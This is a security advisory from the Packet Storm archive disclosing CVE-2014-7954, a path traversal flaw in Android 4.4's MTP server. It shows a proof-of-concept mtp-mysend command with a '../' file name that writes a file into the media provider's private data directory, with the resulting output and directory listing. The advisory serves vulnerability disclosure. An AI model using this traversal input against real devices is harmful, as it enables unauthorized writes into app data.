exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Android 4.4 MTP Path Traversal

Android 4.4 MTP Path Traversal
Posted Apr 19, 2015
Authored by Imre Rad

The doSendObjectInfo() method of the MtpServer class implemented in frameworks/av/media/mtp/MtpServer.cpp on Android 4.4 does not validate the name parameter of the incoming MTP packet, leading to a path traversal vulnerability.

tags | advisory, file inclusion
advisories | CVE-2014-7954
SHA-256 | 9645f86fa24dbcf40e5f7dd36ca986ccbcd0f124fb94b860bde8a37c6cb42100

Android 4.4 MTP Path Traversal

Change Mirror Download
MTP path traversal vulnerability in Android 4.4
-----------------------------------------------

doSendObjectInfo() method of the MtpServer class implemented in
frameworks/av/media/mtp/MtpServer.cpp does not validate the name
parameter of the incoming MTP packet at all.

It is possible to upload files outside of the sdcard using a specially
crafted MTP request:

root@testpc:~/mtp-test# ./mtp-mysend sdf.txt \
../../../.././../data/data/com.android.providers.media/sdf.txt
libmtp version: 1.1.3

Device 0 (VID=18d1 and PID=4e42) is UNKNOWN.
Please report this VID/PID and the device model to the libmtp
development team
Android device detected, assigning default bug flags
Sending sdf.txt as
../../../../../../data/data/com.android.providers.media/sdf.txt
Sending file...
Progress: 25 of 25 (100%)
New file ID: 203



The file is written by the process com.android.providers.media:

root@grouper:/data/data/com.android.providers.media # ls -la
ls -la
drwxrwx--x u0_a6 u0_a6 2014-07-22 01:06 cache
drwxrwx--x u0_a6 u0_a6 2014-07-22 01:07 databases
lrwxrwxrwx install install 2014-07-22 01:05 lib ->
/data/app-lib/com.android.providers.media
-rw-rw-r-- u0_a6 media_rw 13 2014-09-24 01:36 sdf.txt
drwxrwx--x u0_a6 u0_a6 2014-07-22 01:06 shared_prefs


Tested on: Android 4.4.4
Reported on: 2014-09-26
Assigned CVE: CVE-2014-7954
Discovered by: Imre Rad / Search-Lab Ltd.
http://www.search-lab.hu
http://www.securecodingacademy.com/
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close